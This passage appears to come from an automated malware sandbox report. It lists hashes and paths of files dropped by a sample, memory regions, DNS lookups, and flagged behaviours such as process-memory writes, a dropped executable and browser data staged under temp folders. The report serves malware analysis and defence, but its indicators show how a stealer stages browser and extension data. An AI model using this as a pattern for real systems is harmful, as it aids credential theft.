| US | 8.8.8.8:53 | 203.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\830fab18-4e9a-4bb1-8a24-72554fabcfc0.tmp.node
| MD5 | ba973fe2fa62e2bfa81c30cb0d77b2c2 |
| SHA1 | 69fed56755ea90b354ae637e88b04f9568c2a8cb |
| SHA256 | 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778 |
| SHA512 | 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf |
C:\Users\Admin\AppData\Local\Temp\26816be1-193e-4d66-974e-60bdfd02bd0f.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\60b9b61e-2157-4d49-952c-994d811a4cc1.tmp.node
| MD5 | efe1f662b2b23a094b20f0a951c14b10 |
| SHA1 | 9f239fbdb6ec000710bf33923d29eddf65b357c7 |
| SHA256 | 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6 |
| SHA512 | 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07 |
memory/3232-26-0x0000022E06C70000-0x0000022E06C92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxqbckpn.dkv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | feadc4e1a70c13480ef147aca0c47bc0 |
| SHA1 | d7a5084c93842a290b24dacec0cd3904c2266819 |
| SHA256 | 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac |
| SHA512 | c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1
| MD5 | ede83963d9c708680b7e6a6a97115b46 |
| SHA1 | c02bcfd669e4f75f4a381d784b11f0639afc39c3 |
| SHA256 | 516870000b15440f653de5ba4c2c8cc8e9ab44d96371ea2cb29a240c473954d3 |
| SHA512 | f02cbaa3a88c11d3e3cf85638087ec74a9645547be63ed6f648bec0800c5190563647d3c998da3750cb3038687495cc036c4ba28dd7994f67e7fab2357e78aae |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8d460ce715a00afd56cda62e926b8b17 |
| SHA1 | 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22 |
| SHA256 | 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb |
| SHA512 | 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969 |
C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\System\NQPTTMRM - 2024-06-11_175318.png
| MD5 | 2e264d2ae4ddecac3b87091292ad7484 |
| SHA1 | 20230e7a18394d561535a211d6d27c709bffdfde |
| SHA256 | 3d28f0e3aacfb9df81837570e49271ccb737105fe32219241796c4e21470c20b |
| SHA512 | be32d99f09daefefd3a179203d4a1e4c5ddefd4e3395f2a492ba56b909b495ef6f92284dac722f5dc9befa58d6b593d2044bdbb63d838cfafe49a7e19fdbf9d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\Browsers\Bookmarks.txt
| MD5 | 78e6f792c7ee52c112ea84a3deef6d8a |
| SHA1 | b5a77c2816161059c2dd40c81ba89ed8de385f27 |
| SHA256 | 31168dff50aa6099e3ad4b4104e5d6d3ec03f94e21575d525e07f7bbbb7159f0 |
| SHA512 | 3f7ed6950894cc9436d6e5e25d569de60a4667a510b95b4201fe7675ef18e26ab59cfa552a4b97b392828c864e315510e95fe5bad4a4c7cb438665d84be9aa74 |
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip
| MD5 | 564384e5f6ba350c67eff92279bb1b6d |
| SHA1 | d5a0926a7024339062efce2956a841eea4592282 |
| SHA256 | 199ecf0ae1381d1bb71d53ce5d80b74c4fd525f7efd9d1e19267f2b1f7fd5f67 |
| SHA512 | 7c50d73f1004541cd64c1c40c7b5dcd65887c74cb347d2fd03cc2b519c324f0fb2116322085096628ba9fc12a68ecec2b343f0bbd320ba253b9f94c1800eaf71 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5ad057f22389d36eb38a18d31efe295b |
| SHA1 | e8668017f1339dc8496c087295f79516dce8e9bf |
| SHA256 | 205049c83211067b8e11e2fe83e6224dc966c33fee28fc4643efa55d069b41f3 |
| SHA512 | 3169c4d8d2e695debce2f47a0285c9b9b11913392f7ab9911f9530bf13ba94531bb2713becce0d616872263d6fab8097848f28894bf1594ec1e81aa20049cd2a |
C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs
| MD5 | edf3c75d866bd1bdbc903da388aa4183 |
| SHA1 | da5760b42e012281468f8224ae97484ba7c33b0d |
| SHA256 | 251daf1d44d3e25e8684f5c261f44617cb11a1d1610a9dc2adf2250b430e4503 |
| SHA512 | cf34f6215bf41d45764d83be0c224af612bec3ee07dc840ba6cddcdf3ad251c77ba28f904561b265c516c1ac2031b96bbf41a21333400e1cc002e9bd5a3b068c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5c10ece9e67c1d50ee9b458aa8cc169a |
| SHA1 | 45fce8c44fd825126ba098ff354a53474a17f9f0 |
| SHA256 | 71ca49efcebb0543a909d0239c210d1e4480f244e5be344f0d511b2c1ef430b0 |
| SHA512 | 79392ee8c5c61eecde85ee2dc3baacfc351b569f1e96d81493d5ba82c70032efd75143565e4f121ec971e295c822ed5e25a18fa61c1378f53b1f96c42f86fa45 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
| MD5 | 2cfd3dd20571cce21f09407b28b565fb |
| SHA1 | 07a7704986e963e9ba69f7109b7450deccd23eb2 |
| SHA256 | c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792 |
| SHA512 | bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
| MD5 | c555604e8b6f818991e186342f856b1b |
| SHA1 | 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0 |
| SHA256 | 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972 |
| SHA512 | 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
| MD5 | f0f11cd478cc44d518c16820ede9d253 |
| SHA1 | cfaf8d2e071f2ade0894578e5b44e02032d27be4 |
| SHA256 | 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb |
| SHA512 | ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1
| MD5 | 28e4eda7451c625bbe806b745753f729 |
| SHA1 | d29e9b2c2ac5b10188cbae92cffba6827728543d |
| SHA256 | da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba |
| SHA512 | 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5 |
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe
| MD5 | c883e2c769ebe56240a71260b17f1b93 |
| SHA1 | 4a831d4f48f6ea81db508c2a87cf860acd17edb1 |
| SHA256 | 943fd1ea44266c5d7fa02f2b292db095a4e6ba8027a1f6c73fd60d1165e63aff |
| SHA512 | dae40d442794152285ce484b10095d11592a39cb1968bd38cc70ee23005bd1e04ad4312d7266107bdd375e10fa91ab9fd3d41d4d6ccd2268d052b343528c4376 |
memory/4876-435-0x00000000009F0000-0x0000000000A2E000-memory.dmp
memory/4876-436-0x00000000053B0000-0x0000000005442000-memory.dmp
memory/4876-437-0x0000000005A00000-0x0000000005FA4000-memory.dmp
memory/4876-438-0x00000000055C0000-0x00000000055CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseModdingAPI.dll
| MD5 | 9eb11041f2f11d939074e26b4b554088 |
| SHA1 | 50deec7591fcc5db40939543fc9bf92109f2df05 |
| SHA256 | efa31df7ab1394092395365805f913dd023cdcd21796603f133641524fb9ad79 |
| SHA512 | 2d07f40f56ae0dcaba51bc65e4617a0bfd67be13be5156fd7c2850645a461f87b97e46b2c596c21752df2aa488f6e6c329534a523bd7f88234be956b8af13bd1 |
memory/4876-442-0x0000000006830000-0x000000000683A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\config.ini
| MD5 | 072813d2253b25cbcd5858226f5f17a0 |
| SHA1 | c114c97f887e56efc0941ad37ffb3f6730195eac |
| SHA256 | cfeb29c3953c0a6ae97ab52d912311c94e0ab0df87c63ba32770ba4a714d0022 |
| SHA512 | a413ad200790b7a6f109213e73abf3eb20da0608b7b6826f5347e26b519c64581bebab3bf34c91c4aa7cc1181e73d8d824c1eec70aed07c222ef30bcc8779ee3 |
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk1.mp3
| MD5 | db2b7cf36003b2b653df6f3ca986e007 |
| SHA1 | d61a94c7b965dec3daa6351d849fa22f646edf8b |
| SHA256 | 56a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b |
| SHA512 | 3c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3 |
memory/4876-445-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-446-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-447-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-448-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-449-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\MudSquith.mp3
| MD5 | b2354d238829d09c54e272d8b4f60189 |
| SHA1 | 5a2731c04c50903d41f65d9fe5528a66cbefa289 |
| SHA256 | d5281ba99731fe3c443b6b2d18960a49e74b5b407956d3e1a3cde360f86573ba |
| SHA512 | aafbc687b5eac32fe1b4d838ab1ac88103d7f59d0b5f51519845abdd9ae37147e73143e6039719c3d06915107397e3e0a666d0cb1677cdbe05bccebea69ecaf9 |
memory/4876-451-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-452-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-454-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-453-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-455-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\Music\Music.mp3
| MD5 | ecd3eedd1f783552e35f5bec18887ff7 |
| SHA1 | ab75a39baf2311570db5a4d90566a8746fdecc01 |
| SHA256 | 652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7 |
| SHA512 | 14351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994 |
memory/4876-457-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-458-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-460-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-459-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-461-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk3.mp3
| MD5 | bcd1908ce864cb01a222b5cc791d7758 |
| SHA1 | fd1f938c0497cf8cf81832843a58db3ae13eb4d9 |
| SHA256 | e4b86c31838511199dac9eb6e0507736ee461b0edaa4bf9351142c534f2c2e8e |
| SHA512 | 8e883b8d54f9461d1f9dfae64cab391c17b405b6ce351648aa420f0a589def8a4f6d135f3bfb12158aa66df67d4d7b056f0ff3d80c052bf8dc0e1b31a670f759 |
memory/4876-463-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-464-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-466-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-465-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-467-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Images\Memes\icegif-511.gif
| MD5 | eac919eb1e9ebdac0c2529ef769736ce |
| SHA1 | 24de10fc0763417aed6b020a1ff226a656339028 |
| SHA256 | 9ab12e452de8f41040b914d7791e533d0847d09e6be90065a784b907181057db |
| SHA512 | b2bf74a79f800a1ae70fadc7badcbc42dcd776a6da8193789b5cdb236ee96e8e0a06b582d271fc0b98c51353c5ee8ceb7d03640bba7201f5c071313798424718 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 29fd7ba4c4365599ebc5c52cd71c171c |
| SHA1 | 6d7413709b5532115a116b1f0e7f4b791e2d4ab0 |
| SHA256 | 8607711dbf3a10f36f5a05c8ef53d6aeb1c0683420fc6ad5b2990fc043909850 |
| SHA512 | 884d9e7817638f28cfbb8a9cd7ffb5252b94197206fca94f89bb3042127d1e22c5d52a97d6df8d4b16dbacdb20029a025fdd1c60f180e59ca6a3453a5bbf6987 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b16dc67d8633fb86f9d9dc491097150e |
| SHA1 | 0ea564df2675c5e2a82449530dd070ad855dfcd6 |
| SHA256 | 378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b |
| SHA512 | c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd |
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk2.mp3
| MD5 | 3b86bf25cd702a3a071590f088fabf64 |
| SHA1 | 31b279bca59916ba8202b029e7b7b808981a52be |
| SHA256 | 7c8864e0b63969e2469c2d80cd855648044cd15fd89dbabd275954efb7ef6879 |
| SHA512 | b63b24259b6a2acb01f7d066fa10c5ddf4237b0deebab4e4389a40ee677ffb232baa0f3029f47e388eb1f6fbcf97f4a640e41b594ce9f0c41a841b97e471e214 |
memory/4876-640-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-644-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-645-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-643-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-642-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-641-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-650-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-649-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-648-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-647-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\Assets\Sound\NotEmbedded\BITE.mp3
| MD5 | 5436e6aebabf071c1d832071a01b8bcd |
| SHA1 | c7b19e1afcaaea7cc2db55d4ef74f25c0f3603e2 |
| SHA256 | 2bf822b86e4adabce83a796de15fbbfeb75ff82c3bc1ed2a0f5286962915d362 |
| SHA512 | dd1851bb2d6ea5217f59974270ed59b0d7c758c862a333dcf455d43e03ba4c4484a86596c4a7b1ed46c3c671da5ede356ff5c4f7f9d93746d119f4d4332fd204 |
memory/4876-685-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-689-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-688-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-687-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-686-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-953-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-957-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-956-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-955-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-954-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1138-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1141-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1140-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1142-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1139-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1143-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1144-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1147-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1146-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1145-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1148-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1151-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1150-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1152-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1149-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1153-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1156-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1155-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1154-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1157-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1158-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1161-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1160-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
memory/4876-1159-0x0000000007BD0000-0x0000000007BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8b167567021ccb1a9fdf073fa9112ef0 |
| SHA1 | 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898 |
| SHA256 | 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513 |
| SHA512 | 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0082c8bfdbaa02538ade9f6f6b3ad91a |
| SHA1 | fc1638ad73c01f106e0de926f38d982475c30329 |
| SHA256 | 7c0f1ab3735a5bce58635317157a00730c7e6fde1d0111344783bb489b040982 |
| SHA512 | b813ec1268f1583fb4b9c0daf3a0a131160153c354b416874bf57a22ce2ab3c8a8103f98d062e936f6615196e815f2e58b8dd5804b76612c01f2fdd99e50e14c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 83bd19b5f527faa0db7a98fe3e75fd40 |
| SHA1 | 2b62e33b56390dbb5846f6ef4a658e9cbf07b857 |
| SHA256 | e757b14ab35263d70a1648db65414a00af3937e4d103373c3cd06d83a3fe197c |
| SHA512 | c2dee11a50fe2017ad48925dc9ec2d7c0d3412a746313583f43c522d4d7077e3a091a4e032816e992640e81f48b4583cd0c82320fb8a6593ab024edc647a8c33 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 537815e7cc5c694912ac0308147852e4 |
| SHA1 | 2ccdd9d9dc637db5462fe8119c0df261146c363c |
| SHA256 | b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f |
| SHA512 | 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a |
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240221-en
Max time kernel
120s
Max time network
129s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2192 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2192 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2192 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2192 -s 88
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240426-en
Max time kernel
147s
Max time network
157s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240508-en
Max time kernel
117s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1640 wrote to memory of 2240 | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe |
| PID 1640 wrote to memory of 2240 | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe |
| PID 1640 wrote to memory of 2240 | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe |
